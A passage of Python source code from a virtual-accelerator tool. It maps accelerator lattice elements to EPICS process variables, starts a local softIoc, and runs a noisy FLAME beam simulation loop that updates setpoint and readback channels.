@property\n def config(self):\n return self._config\n\n @config.setter\n def config(self, config):\n if not isinstance(config, Configuration):\n raise TypeError(\"VirtAccelFactory: 'config' property must be type Configuration\")\n self._config = config\n\n @property\n def settings(self):\n return self._settings\n\n @settings.setter\n def settings(self, settings):\n if not isinstance(settings, dict):\n raise TypeError(\"VirtAccelFactory: 'settings' property must be type dict\")\n self._settings = settings\n\n @property\n def channels(self):\n return self._channels\n\n @channels.setter\n def channels(self, channels):\n if not isinstance(channels, list):\n raise TypeError(\"VirtAccelFactory: 'channels' property must be type list\")\n self._channels = channels\n\n @property\n def machine(self):\n return self._machine\n\n @machine.setter\n def machine(self, machine):\n if (machine is not None) and not isinstance(machine, basestring):\n raise TypeError(\"VirtAccelFactory: 'machine' property must be type string or None\")\n self._machine = machine\n\n @property\n def data_dir(self):\n return self._data_dir\n\n @data_dir.setter\n def data_dir(self, data_dir):\n if (data_dir is not None) and not isinstance(data_dir, basestring):\n raise TypeError(\"VirtAccelFactory: 'data_dir' property must be type string or None\")\n self._data_dir = data_dir\n\n @property\n def work_dir(self):\n return self._work_dir\n\n @work_dir.setter\n def work_dir(self, work_dir):\n if (work_dir is not None) and not isinstance(work_dir, basestring):\n raise TypeError(\"VirtAccelFactory: 'work_dir' property must be type string or None\")\n self._work_dir = work_dir\n\n def _findChannel(self, name, field, handle):\n for channel, props, _ in self.channels:\n if props[\"elemName\"] != name:\n continue\n if props[\"elemField_eng\"] != field:\n continue\n if props[\"elemHandle\"] != handle:\n continue\n # IMPORTANT: Channel names originating from channel finder\n # may be of type 'unicode' instead of 'str'. 
The cothread\n # library does not have proper support for unicode strings.\n return str(channel)\n\n raise RuntimeError(\"VirtAccelFactory: channel not found: '{}', '{}', '{}'\".format(name, field, handle))\n\n def _get_config(self, section, option, defvalue):\n if self.config.has_option(section, option):\n value = self.config.get(section, option)\n _LOGGER.debug(\"VirtAccelFactory: [{}] '{}' found in configuration: {}\".format(section, option, value))\n return value\n return defvalue\n\n def build(self):\n \"\"\"Process the accelerator description and configure the Virtual Accelerator.\n \"\"\"\n settings = self.settings\n\n data_dir = self.data_dir\n if (data_dir is None) and self.config.has_default(CONFIG_FLAME_DATA_DIR):\n data_dir = self.config.getabspath_default(CONFIG_FLAME_DATA_DIR)\n\n if data_dir is None:\n raise RuntimeError(\"VirtAccelFactory: No data directory provided, check the configuration\")\n\n work_dir = self.work_dir\n\n latfactory = FlameLatticeFactory(self.layout, config=self.config, settings=self.settings)\n latfactory.start = self.start\n latfactory.end = self.end\n\n m = re.match(\"(.*:)?(.*):(.*):(.*)\", self.channels[0][0])\n if not m:\n raise RuntimeError(\"VirtAccelFactory: Error determining channel prefix, check channel names\")\n\n if m.group(1) is None:\n chanprefix = None\n else:\n # IMPORTANT: chanprefix must\n # be converted from unicode\n chanprefix = str(m.group(1))\n\n va = VirtualAccelerator(latfactory, settings, chanprefix, data_dir, work_dir)\n\n for elem in self.layout.iter(start=self.start, end=self.end):\n # check drift mask first\n if self._get_config(elem.dtype, CONFIG_DRIFT_MASK, 'False').lower() == 'true':\n elem = DriftElement(elem.z, elem.length, elem.aperture, elem.name)\n #\n\n if isinstance(elem, CavityElement):\n # Need to normalize cavity phase settings to 0~360\n settings[elem.name][elem.fields.phase_phy] = _normalize_phase(settings[elem.name][elem.fields.phase_phy])\n va.append_rw(self._findChannel(elem.name, elem.fields.phase, \"setpoint\"),\n self._findChannel(elem.name, elem.fields.phase, \"readset\"),\n self._findChannel(elem.name, elem.fields.phase, \"readback\"),\n (elem.name, elem.fields.phase_phy), desc=\"Cavity Phase\", egu=\"degree\", drvh=360, drvl=0)\n va.append_rw(self._findChannel(elem.name, elem.fields.amplitude, \"setpoint\"),\n self._findChannel(elem.name, elem.fields.amplitude, \"readset\"),\n self._findChannel(elem.name, elem.fields.amplitude, \"readback\"),\n (elem.name, elem.fields.amplitude_phy), desc=\"Cavity Amplitude\", egu=\"%\")\n va.append_elem(elem)\n\n elif isinstance(elem, SolCorElement):\n va.append_rw(self._findChannel(elem.name, elem.fields.field, \"setpoint\"),\n self._findChannel(elem.name, elem.fields.field, \"readset\"),\n self._findChannel(elem.name, elem.fields.field, \"readback\"),\n (elem.name, elem.fields.field_phy), desc=\"Solenoid Field\", egu=\"T\") #, drvratio=0.10)\n va.append_rw(self._findChannel(elem.h.name, elem.h.fields.angle, \"setpoint\"),\n self._findChannel(elem.h.name, elem.h.fields.angle, \"readset\"),\n self._findChannel(elem.h.name, elem.h.fields.angle, \"readback\"),\n (elem.h.name, elem.h.fields.angle_phy), desc=\"Horizontal Corrector\", egu=\"radian\") #, drvabs=0.001)\n va.append_rw(self._findChannel(elem.v.name, elem.v.fields.angle, \"setpoint\"),\n self._findChannel(elem.v.name, elem.v.fields.angle, \"readset\"),\n self._findChannel(elem.v.name, elem.v.fields.angle, \"readback\"),\n (elem.v.name, elem.v.fields.angle_phy), desc=\"Vertical Corrector\", egu=\"radian\") 
#, drvabs=0.001)\n va.append_elem(elem)\n\n elif isinstance(elem, SolElement):\n va.append_rw(self._findChannel(elem.name, elem.fields.field, \"setpoint\"),\n self._findChannel(elem.name, elem.fields.field, \"readset\"),\n self._findChannel(elem.name, elem.fields.field, \"readback\"),\n (elem.name, elem.fields.field_phy), desc=\"Solenoid Field\", egu=\"T\") #, drvratio=0.10)\n va.append_elem(elem)\n\n elif isinstance(elem, CorElement):\n va.append_rw(self._findChannel(elem.h.name, elem.h.fields.angle, \"setpoint\"),\n self._findChannel(elem.h.name, elem.h.fields.angle, \"readset\"),\n self._findChannel(elem.h.name, elem.h.fields.angle, \"readback\"),\n (elem.h.name, elem.h.fields.angle_phy), desc=\"Horizontal Corrector\", egu=\"radian\") #, drvabs=0.001)\n va.append_rw(self._findChannel(elem.v.name, elem.v.fields.angle, \"setpoint\"),\n self._findChannel(elem.v.name, elem.v.fields.angle, \"readset\"),\n self._findChannel(elem.v.name, elem.v.fields.angle, \"readback\"),\n (elem.v.name, elem.v.fields.angle_phy), desc=\"Vertical Corrector\", egu=\"radian\") #, drvabs=0.001)\n va.append_elem(elem)\n\n elif isinstance(elem, BendElement):\n va.append_rw(self._findChannel(elem.name, elem.fields.field, \"setpoint\"),\n self._findChannel(elem.name, elem.fields.field, \"readset\"),\n self._findChannel(elem.name, elem.fields.field, \"readback\"),\n (elem.name, elem.fields.field_phy), desc=\"Bend Relative Field\", egu=\"none\") #, drvratio=0.10)\n va.append_elem(elem)\n\n elif isinstance(elem, EBendElement):\n va.append_rw(self._findChannel(elem.name, elem.fields.field, \"setpoint\"),\n self._findChannel(elem.name, elem.fields.field, \"readset\"),\n self._findChannel(elem.name, elem.fields.field, \"readback\"),\n (elem.name, elem.fields.field_phy), desc=\"EBend Field\", egu=\"V\") #, drvratio=0.10)\n va.append_elem(elem)\n\n elif isinstance(elem, QuadElement):\n va.append_rw(self._findChannel(elem.name, elem.fields.gradient, \"setpoint\"),\n self._findChannel(elem.name, elem.fields.gradient, \"readset\"),\n self._findChannel(elem.name, elem.fields.gradient, \"readback\"),\n (elem.name, elem.fields.gradient_phy), desc=\"Quadrupole Gradient\", egu=\"T/m\") #, drvratio=0.10)\n va.append_elem(elem)\n\n elif isinstance(elem, EQuadElement):\n va.append_rw(self._findChannel(elem.name, elem.fields.gradient, \"setpoint\"),\n self._findChannel(elem.name, elem.fields.gradient, \"readset\"),\n self._findChannel(elem.name, elem.fields.gradient, \"readback\"),\n (elem.name, elem.fields.gradient_phy), desc=\"EQuad Field\", egu=\"V\")\n va.append_elem(elem)\n\n elif isinstance(elem, SextElement):\n va.append_rw(self._findChannel(elem.name, elem.fields.field, \"setpoint\"),\n self._findChannel(elem.name, elem.fields.field, \"readset\"),\n self._findChannel(elem.name, elem.fields.field, \"readback\"),\n (elem.name, elem.fields.field_phy), desc=\"Sextupole Gradient\", egu=\"T/m^2\")\n va.append_elem(elem)\n\n elif isinstance(elem, BPMElement):\n va.append_ro(self._findChannel(elem.name, elem.fields.x, \"readback\"),\n (elem.name, elem.fields.x_phy), desc=\"Horizontal Position\", egu=\"m\")\n va.append_ro(self._findChannel(elem.name, elem.fields.y, \"readback\"),\n (elem.name, elem.fields.y_phy), desc=\"Vertical Position\", egu=\"m\")\n va.append_ro(self._findChannel(elem.name, elem.fields.phase, \"readback\"),\n (elem.name, elem.fields.phase_phy), desc=\"Beam Phase\", egu=\"degree\")\n va.append_ro(self._findChannel(elem.name, elem.fields.energy, \"readback\"),\n (elem.name, elem.fields.energy_phy), desc=\"Beam 
Energy\", egu=\"MeV\")\n va.append_elem(elem)\n\n elif isinstance(elem, PMElement):\n va.append_ro(self._findChannel(elem.name, elem.fields.x, \"readback\"),\n (elem.name, elem.fields.x), desc=\"Horizontal Position\", egu=\"m\")\n va.append_ro(self._findChannel(elem.name, elem.fields.y, \"readback\"),\n (elem.name, elem.fields.y), desc=\"Vertical Position\", egu=\"m\")\n va.append_ro(self._findChannel(elem.name, elem.fields.xy, \"readback\"),\n (elem.name, elem.fields.xy), desc=\"Diagonal Position\", egu=\"m\")\n va.append_ro(self._findChannel(elem.name, elem.fields.xrms, \"readback\"),\n (elem.name, elem.fields.xrms), desc=\"Horizontal Size\", egu=\"m\")\n va.append_ro(self._findChannel(elem.name, elem.fields.yrms, \"readback\"),\n (elem.name, elem.fields.yrms), desc=\"Vertical Size\", egu=\"m\")\n va.append_ro(self._findChannel(elem.name, elem.fields.xyrms, \"readback\"),\n (elem.name, elem.fields.xyrms), desc=\"Diagonal Size\", egu=\"m\")\n va.append_ro(self._findChannel(elem.name, elem.fields.cxy, \"readback\"),\n (elem.name, elem.fields.cxy), desc=\"X-Y Correlation\", egu=\"m\")\n va.append_elem(elem)\n\n elif isinstance(elem, (BLMElement, BLElement, BCMElement)):\n # ignore these diagnostic elements for now\n pass\n\n elif isinstance(elem, (ValveElement, PortElement, StripElement)):\n # ignore these elements with no relevant channels\n pass\n\n elif isinstance(elem, DriftElement):\n # drift elements have no channels\n pass\n\n elif isinstance(elem, (AttenuatorElement, ApertureElement,\n ChopperElement, DumpElement, SlitElement)):\n # no channels for now\n pass\n\n elif isinstance(elem, (EMSElement, VDElement, FCElement)):\n pass\n\n elif isinstance(elem, ElectrodeElement):\n pass\n\n else:\n raise RuntimeError(\"Unsupported element type: {}\".format(type(elem).__name__))\n\n return va\n\n\nclass VirtualAccelerator(object):\n \"\"\"VirtualAccelerator executes and manages the EPICS IOC process and\n FLAME simulation thread.\n \"\"\"\n def __init__(self, latfactory, settings, chanprefix, data_dir, work_dir=None):\n if not isinstance(latfactory, FlameLatticeFactory):\n raise TypeError(\"VirtualAccelerator: Invalid type for FlameLatticeFactory\")\n self._latfactory = latfactory\n\n if not isinstance(settings, dict):\n raise TypeError(\"VirtualAccelerator: Invalid type for accelerator Settings\")\n self._settings = settings\n\n self._chanprefix = chanprefix\n self._data_dir = data_dir\n self._work_dir = work_dir\n\n self._epicsdb = []\n self._csetmap = OrderedDict()\n self._elemmap = OrderedDict()\n self._fieldmap = OrderedDict()\n self._readfieldmap = OrderedDict()\n\n self._noise = 0.001\n\n self._started = False\n self._continue = False\n self._rm_work_dir = False\n\n self._ioc_process = None\n self._ioc_logfile = None\n\n self._subscriptions = None\n self._wait_event = cothread.Event(False)\n\n @property\n def data_dir(self):\n return self._data_dir\n\n @data_dir.setter\n def data_dir(self, data_dir):\n if not isinstance(data_dir, basestring):\n raise TypeError(\"VirtualAccelerator: 'data_dir' property must be type string\")\n self._data_dir = data_dir\n\n @property\n def work_dir(self):\n return self._work_dir\n\n @work_dir.setter\n def work_dir(self, work_dir):\n if (work_dir is not None) and not isinstance(work_dir, basestring):\n raise TypeError(\"VirtualAccelerator: 'work_dir' property must be type string or None\")\n self._work_dir = work_dir\n\n 
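# Editor's note (added commentary, not part of the original source): append_rw
# below registers three EPICS records per writable device field. A hypothetical
# call such as
#
#     va.append_rw('VA:CAV1:PHA_CSET', 'VA:CAV1:PHA_RSET', 'VA:CAV1:PHA_RD',
#                  ('CAV1', 'PHA'), desc='Cavity Phase', egu='degree',
#                  drvh=360, drvl=0)
#
# (channel names invented for illustration) would emit one 'ao' setpoint record
# carrying the drive limits plus two 'ai' records for the setpoint readback and
# the simulated readback.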
def append_rw(self, cset, rset, read, field, desc=\"Element\", egu=\"\", prec=5, drvh=None, drvl=None, drvabs=None, drvrel=None, drvratio=None):\n \"\"\"Append a set of read/write channels to this virtual accelerator.\n The algorithm to set EPICS DRVH/DRVL is as follows:\n - if absolute limit (drvabs) is given, use absolute\n - or if relative limit (drvrel) is given, use relative\n - or if a ratio (drvratio) is given, use ratio\n - otherwise, no limit.\n\n Parameters\n ----------\n cset : str\n PV name of set point, handle is 'setpoint'.\n rset : str\n PV name of read back for set point, handle is 'readset'.\n read : str\n PV name of read back, handle is 'readback'.\n field : tuple\n Tuple with element name and field.\n desc : str\n Element description.\n egu :\n EPICS record engineering unit.\n prec : int\n EPICS display precision.\n drvabs :\n Absolute driven limit with +-abs(drvabs).\n drvrel :\n Relative driven limit, value +- abs(drvrel).\n drvratio :\n Driven ratio of setting point value * (1 +- ratio).\n \"\"\"\n if self.is_started():\n raise RuntimeError(\"VirtualAccelerator: Cannot append RW channel when started\")\n\n val = self._settings[field[0]][field[1]]\n if drvabs is not None:\n drvh = abs(drvabs)\n drvl = - abs(drvabs)\n elif drvrel is not None:\n drvh = val + abs(drvrel)\n drvl = val - abs(drvrel)\n elif drvratio is not None:\n drvh = val + abs(val*drvratio)\n drvl = val - abs(val*drvratio)\n\n self._epicsdb.append((\"ao\", cset, OrderedDict([\n (\"DESC\", \"{} Set Point\".format(desc)),\n (\"VAL\", val),\n (\"DRVH\", drvh),\n (\"DRVL\", drvl),\n (\"PREC\", prec),\n (\"EGU\", egu)\n ])))\n\n self._epicsdb.append((\"ai\", rset, OrderedDict([\n (\"DESC\", \"{} Set Point Read Back\".format(desc)),\n (\"VAL\", val),\n (\"PREC\", prec),\n (\"EGU\", egu)\n ])))\n\n self._epicsdb.append((\"ai\", read, OrderedDict([\n (\"DESC\", \"{} Read Back\".format(desc)),\n (\"VAL\", val),\n (\"PREC\", prec),\n (\"EGU\", egu)\n ])))\n\n self._csetmap[cset] = (rset, read)\n self._fieldmap[cset] = field\n\n def append_ro(self, read, field, desc=\"Element\", egu=\"\", prec=5):\n \"\"\"Append a read-only channel to this virtual accelerator.\n\n Parameters\n ----------\n read : str\n PV name of read back, handle is 'readback'.\n field : tuple\n Tuple with element name and field.\n desc : str\n Element description.\n egu :\n EPICS record engineering unit.\n prec : int\n EPICS display precision.\n \"\"\"\n if self.is_started():\n raise RuntimeError(\"VirtualAccelerator: Cannot append RO channel when started\")\n\n self._epicsdb.append((\"ai\", read, OrderedDict([\n (\"DESC\", \"{} Read Back\".format(desc)),\n (\"VAL\", \"0.0\"),\n (\"PREC\", prec),\n (\"EGU\", egu)\n ])))\n\n if field[0] not in self._readfieldmap:\n self._readfieldmap[field[0]] = OrderedDict()\n self._readfieldmap[field[0]][field[1]] = read\n\n def append_elem(self, elem):\n \"\"\"Append an accelerator element to this virtual accelerator.\n \"\"\"\n if self.is_started():\n raise RuntimeError(\"VirtualAccelerator: Cannot append element when started\")\n self._elemmap[elem.name] = elem\n\n def is_started(self):\n \"\"\"Check if the virtual accelerator has been started.\"\"\"\n return self._started\n\n 
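# Editor's note (worked example, not part of the original source): with the
# drive-limit algebra in append_rw above, a current setting val = 2.0 combined
# with drvratio = 0.10 yields DRVH = 2.0 + abs(2.0*0.10) = 2.2 and
# DRVL = 2.0 - 0.2 = 1.8, while drvabs = 0.5 gives the symmetric window
# DRVH = 0.5, DRVL = -0.5 regardless of the current setting.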
def start(self, raise_on_wait=False):\n \"\"\"Start the virtual accelerator.\n Spawn a new cothread to handle execution.\n \"\"\"\n _LOGGER.debug(\"VirtualAccelerator: Start\")\n cothread.Spawn(self._co_start, raise_on_wait, raise_on_wait=True).Wait()\n\n def _co_start(self, raise_on_wait):\n _LOGGER.debug(\"VirtualAccelerator: Start (cothread)\")\n if self._started:\n raise RuntimeError(\"VirtualAccelerator: Already started\")\n\n if not os.path.isdir(self.data_dir):\n raise RuntimeError(\"VirtualAccelerator: Data directory not found: {}\".format(self.data_dir))\n\n if self.work_dir is not None and os.path.exists(self.work_dir):\n raise RuntimeError(\"VirtualAccelerator: Working directory already exists: {}\".format(self.work_dir))\n\n self._started = True\n self._continue = True\n self._wait_event.Reset()\n cothread.Spawn(self._co_execute_with_cleanup, raise_on_wait, raise_on_wait=False)\n\n def stop(self):\n \"\"\"Stop the virtual accelerator.\n Spawn a new cothread to stop gracefully.\n \"\"\"\n _LOGGER.debug(\"VirtualAccelerator: Stop\")\n cothread.Spawn(self._co_stop, raise_on_wait=True).Wait()\n\n def _co_stop(self):\n _LOGGER.debug(\"VirtualAccelerator: Stop (cothread)\")\n if self._started:\n _LOGGER.debug(\"VirtualAccelerator: Initiate shutdown\")\n self._continue = False\n else:\n raise RuntimeError(\"VirtualAccelerator: Not started\")\n\n def wait(self, timeout=None):\n \"\"\"Wait for the virtual accelerator to stop.\n \"\"\"\n _LOGGER.debug(\"VirtualAccelerator: Wait\")\n cothread.Spawn(self._co_wait, timeout, raise_on_wait=True).Wait()\n\n def _co_wait(self, timeout):\n _LOGGER.debug(\"VirtualAccelerator: Wait (cothread)\")\n if self._started:\n self._wait_event.Wait(timeout)\n else:\n raise RuntimeError(\"VirtualAccelerator: Not started\")\n\n def _co_execute_with_cleanup(self, raise_on_wait):\n \"\"\"Executor method: wrap the call to _co_execute and ensure\n proper cleanup of connections and processes.\n \"\"\"\n _LOGGER.debug(\"VirtualAccelerator: Execute (cothread)\")\n execute_error = None\n try:\n cothread.Spawn(self._co_execute, raise_on_wait=raise_on_wait).Wait()\n except Exception as e:\n execute_error = e\n finally:\n _LOGGER.info(\"VirtualAccelerator: Cleanup\")\n if self._subscriptions is not None:\n _LOGGER.debug(\"VirtualAccelerator: Cleanup: close connections\")\n for sub in self._subscriptions:\n sub.close()\n self._subscriptions = None\n\n if self._ioc_process is not None:\n _LOGGER.debug(\"VirtualAccelerator: Cleanup: terminate IOC process\")\n self._ioc_process.terminate()\n self._ioc_process.wait()\n self._ioc_process = None\n\n if self._ioc_logfile is not None:\n _LOGGER.debug(\"VirtualAccelerator: Cleanup: close IOC log file\")\n self._ioc_logfile.close()\n self._ioc_logfile = None\n else:\n _LOGGER.debug(\"VirtualAccelerator: Cleanup: IOC log file is NONE\")\n\n if self._rm_work_dir:\n _LOGGER.debug(\"VirtualAccelerator: Cleanup: remove work directory\")\n shutil.rmtree(self.work_dir)\n else:\n _LOGGER.debug(\"VirtualAccelerator: Cleanup: work directory is NONE\")\n\n self._started = False\n self._continue = False\n\n if execute_error is None:\n self._wait_event.Signal()\n else:\n self._wait_event.SignalException(execute_error)\n\n 
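# Editor's note (illustrative sketch, not part of the original source): a
# typical client-side lifecycle for a built VirtualAccelerator instance va:
#
#     va.start()             # spawns _co_execute_with_cleanup on a cothread
#     ...                    # interact with the EPICS PVs while it runs
#     va.stop()              # request shutdown of the simulation loop
#     va.wait(timeout=10.0)  # block until cleanup has finished
#
# An exception raised inside the loop is stored by the cleanup wrapper and
# appears to be re-raised to the caller of wait() via SignalException above.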
def _co_execute(self):\n \"\"\"Execute the virtual accelerator. This includes the following:\n\n 1. Create a temporary working directory for execution of FLAME.\n 2. Set up the working directory by symlinking from the data directory.\n 3. Write the EPICS DB to the working directory (va.db).\n 4. Start the softIoc and initialize the channel monitors.\n 5. Add noise to the settings for all input (CSET) channels.\n 6. Create or update the FLAME machine configuration.\n 7. Propagate the FLAME simulation and read the results.\n 8. Update the READ channels of all devices.\n 9. Update the RSET channels of input devices.\n 10. Repeat from step #5.\n \"\"\"\n _LOGGER.debug(\"VirtualAccelerator: Execute virtual accelerator\")\n\n if self._chanprefix is None:\n chanprefix = \"\"\n else:\n chanprefix = self._chanprefix\n\n # Add channel for sample counting\n sample_cnt = chanprefix + \"SVR:CNT\"\n\n self._epicsdb.append((\"ai\", sample_cnt, OrderedDict([\n (\"DESC\", \"Sample counter for scan client\"),\n (\"VAL\", 0)\n ])))\n\n # Add channel for VA configuration and control\n channoise = chanprefix+\"SVR:NOISE\"\n\n self._epicsdb.append((\"ao\", channoise, OrderedDict([\n (\"DESC\", \"Noise level of Virtual Accelerator\"),\n (\"VAL\", 0.001),\n (\"PREC\", 5)\n ])))\n\n chanstat = chanprefix+\"SVR:STATUS\"\n\n self._epicsdb.append((\"bi\", chanstat, OrderedDict([\n (\"DESC\", \"Status of Virtual Accelerator\"),\n (\"VAL\", 1),\n (\"ZNAM\", \"ERR\"),\n (\"ONAM\", \"OK\"),\n (\"PINI\", \"1\")\n ])))\n\n chancharge = chanprefix+\"SVR:CHARGE\"\n\n self._epicsdb.append((\"ai\", chancharge, OrderedDict([\n (\"DESC\", \"Q/M of Virtual Accelerator\"),\n (\"VAL\", 0.0),\n (\"PREC\", 5)\n ])))\n\n if self.work_dir is not None:\n os.makedirs(self.work_dir)\n self._rm_work_dir = False\n else:\n self.work_dir = tempfile.mkdtemp(_TEMP_DIRECTORY_SUFFIX)\n self._rm_work_dir = True\n\n _LOGGER.info(\"VirtualAccelerator: Working directory: %s\", self._work_dir)\n\n # input file paths\n epicsdbpath = os.path.join(self.work_dir, \"va.db\")\n latticepath = os.path.join(self.work_dir, \"test.lat\")\n\n # output file paths\n epicslogpath = os.path.join(self.work_dir, \"softioc.log\")\n\n if os.path.isabs(self.data_dir):\n abs_data_dir = self.data_dir\n self._latfactory.dataDir = self.data_dir\n else:\n abs_data_dir = os.path.abspath(self.data_dir)\n self._latfactory.dataDir = os.path.abspath(self.data_dir)\n _LOGGER.debug(\"VirtualAccelerator: FLAME data directory: %s\", self._latfactory.dataDir)\n\n with open(epicsdbpath, \"w\") as outfile:\n self._write_epicsdb(outfile)\n _LOGGER.info(\"VirtualAccelerator: Write EPICS database to %s\", epicsdbpath)\n\n self._ioc_logfile = open(epicslogpath, \"w\")\n self._ioc_process = Popen([\"softIoc\", \"-d\", \"va.db\"], cwd=self.work_dir,\n stdout=self._ioc_logfile, stderr=subprocess.STDOUT)\n _LOGGER.debug(\"VirtualAccelerator: Start EPICS soft IOC with log %s\", epicslogpath)\n\n _LOGGER.debug(\"VirtualAccelerator: Connecting to channels: {}\".format(len(self._csetmap.keys())))\n\n self._subscriptions = []\n\n self._subscriptions.append(catools.camonitor(channoise, self._handle_noise_monitor))\n\n self._subscriptions.extend(catools.camonitor(self._csetmap.keys(), self._handle_cset_monitor))\n\n _LOGGER.debug(\"VirtualAccelerator: Connecting to channels: Done\")\n\n machine = None\n\n while self._continue:\n # update the RSET channels with new settings\n batch = catools.CABatch()\n for cset in self._csetmap.items():\n name, field = self._fieldmap[cset[0]]\n batch[cset[1][0]] = self._settings[name][field]\n batch.caput()\n\n settings = self._copy_settings_with_noise()\n self._latfactory.settings = settings\n lattice = self._latfactory.build()\n\n with open(latticepath, \"w\") as outfile:\n lattice.write(outfile)\n\n start = time.time()\n\n if machine is None:\n _LOGGER.debug(\"VirtualAccelerator: Create FLAME 
machine from configuration\")\n machine = Machine(lattice.conf())\n else:\n _LOGGER.debug(\"VirtualAccelerator: Reconfigure FLAME machine from configuration\")\n for idx, elem in enumerate(lattice.elements):\n machine.reconfigure(idx, elem[2])\n\n _LOGGER.debug(\"VirtualAccelerator: Allocate FLAME state from configuration\")\n S = machine.allocState({})\n\n output_map = []\n for elem in lattice.elements:\n if 'name' in elem[3]:\n output_map.append(elem[3]['name'])\n else:\n output_map.append(None)\n\n batch = catools.CABatch()\n for i in range(0, len(machine)):\n machine.propagate(S, i, 1)\n\n if output_map[i] in self._elemmap:\n elem = self._elemmap[output_map[i]]\n if isinstance(elem, BPMElement):\n x_centroid = S.moment0_env[0]/1.0e3 # convert mm to m\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.x_phy], x_centroid)\n batch[self._readfieldmap[elem.name][elem.fields.x_phy]] = x_centroid\n y_centroid = S.moment0_env[2]/1.0e3 # convert mm to m\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.y_phy], y_centroid)\n batch[self._readfieldmap[elem.name][elem.fields.y_phy]] = y_centroid\n # convert rad to deg and adjust for 161MHz sampling frequency\n phase = _normalize_phase(2.0 * S.ref_phis * (180.0 / math.pi))\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.phase_phy], phase)\n batch[self._readfieldmap[elem.name][elem.fields.phase_phy]] = phase\n energy = S.ref_IonEk/1.0e6 # convert eV to MeV\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.energy_phy], energy)\n batch[self._readfieldmap[elem.name][elem.fields.energy_phy]] = energy\n elif isinstance(elem, PMElement):\n x_centroid = S.moment0_env[0]/1.0e3 # convert mm to m\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.x], x_centroid)\n batch[self._readfieldmap[elem.name][elem.fields.x]] = x_centroid\n y_centroid = S.moment0_env[2]/1.0e3 # convert mm to m\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.y], y_centroid)\n batch[self._readfieldmap[elem.name][elem.fields.y]] = y_centroid\n x_rms = S.moment0_rms[0]/1.0e3 # convert mm to m\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.xrms], x_rms)\n batch[self._readfieldmap[elem.name][elem.fields.xrms]] = x_rms\n y_rms = S.moment0_rms[2]/1.0e3\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.yrms], y_rms)\n batch[self._readfieldmap[elem.name][elem.fields.yrms]] = y_rms\n\n sign = elem.sign\n xy_centroid = (sign*x_centroid + y_centroid)/math.sqrt(2.0) # convert mm to m\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.xy], xy_centroid)\n batch[self._readfieldmap[elem.name][elem.fields.xy]] = xy_centroid\n\n xy_rms = 1.0e-3*math.sqrt(\n (S.moment1_env[0, 0] + S.moment1_env[2, 2])*0.5\n + sign*S.moment1_env[0, 2]\n )\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.xyrms], xy_rms)\n batch[self._readfieldmap[elem.name][elem.fields.xyrms]] = xy_rms\n\n cxy = sign * S.moment1_env[0, 2] * 1e-6 / x_rms / y_rms\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\",\n self._readfieldmap[elem.name][elem.fields.cxy], cxy)\n 
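# Editor's note (added explanation, not part of the original source): for the
# 45-degree profile-monitor wire, xy = (sign*x + y)/sqrt(2), hence
# Var(xy) = (Var(x) + Var(y))/2 + sign*Cov(x, y), which is exactly the
# moment1_env expression used for xy_rms above (the 1.0e-3 factor converts mm
# to m), and cxy is the Pearson correlation sign*Cov(x, y)/(x_rms*y_rms), with
# 1e-6 converting the mm^2 covariance to m^2. (The '# convert mm to m' comment
# on the xy_centroid line is a leftover copy; x_centroid and y_centroid are
# already in metres at that point.)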
batch[self._readfieldmap[elem.name][elem.fields.cxy]] = cxy\n\n batch.caput()\n\n _LOGGER.info(\"VirtualAccelerator: FLAME execution time: %f s\", time.time()-start)\n\n # Allow the BPM, PM, etc. readbacks to update\n # before the device setting readbacks PVs.\n cothread.Yield()\n\n batch = catools.CABatch()\n for name, value in self._csetmap.items():\n name, field = self._fieldmap[name]\n _LOGGER.debug(\"VirtualAccelerator: Update read: %s to %s\", value[1], settings[name][field])\n batch[value[1]] = settings[name][field]\n batch.caput()\n\n # Sleep for a fraction (10%) of the total execution time\n # when one simulation costs more than 0.50 seconds.\n # Otherwise, sleep for the rest of 1 second.\n # If a scan is being done on this virtual accelerator,\n # then the scan server has a period of time to update\n # setpoints before the next run of IMPACT.\n if (time.time()-start) > 0.50:\n cothread.Sleep((time.time()-start)*0.1)\n else:\n cothread.Sleep(1.0 - (time.time()-start))\n\n def _handle_cset_monitor(self, value, idx):\n \"\"\"Handle updates of CSET channels by updating\n the corresponding setting and RSET channel.\n \"\"\"\n cset = list(self._csetmap.items())[idx]\n _LOGGER.debug(\"VirtualAccelerator: Update cset: '%s' to %s\", cset[0], value)\n name, field = self._fieldmap[cset[0]]\n self._settings[name][field] = float(value)\n\n def _handle_noise_monitor(self, value):\n \"\"\"Handle updates of the NOISE channel.\n \"\"\"\n _LOGGER.debug(\"VirtualAccelerator: Update noise: %s\", value)\n self._noise = float(value)\n\n def _copy_settings_with_noise(self):\n s = deepcopy(self._settings)\n for name, field in self._fieldmap.values():\n s[name][field] = s[name][field] + s[name][field] * self._noise * 2.0*(random.random()-0.5)\n return s\n\n def _write_epicsdb(self, buf):\n for record in self._epicsdb:\n buf.write(\"record({}, \\\"{}\\\") {{\\r\\n\".format(record[0], record[1]))\n for name, value in record[2].items():\n if value is None:\n pass # ignore fields with value None\n elif isinstance(value, int):\n buf.write(\" field(\\\"{}\\\", {})\\r\\n\".format(name, value))\n elif isinstance(value, float):\n buf.write(\" field(\\\"{}\\\", {})\\r\\n\".format(name, value))\n else:\n buf.write(\" field(\\\"{}\\\", \\\"{}\\\")\\r\\n\".format(name, value))\n buf.write(\"}\\r\\n\\r\\n\")\n\n\ndef _normalize_phase(phase):\n while phase >= 360.0:\n phase -= 360.0\n while phase < 0.0:\n phase += 360.0\n return 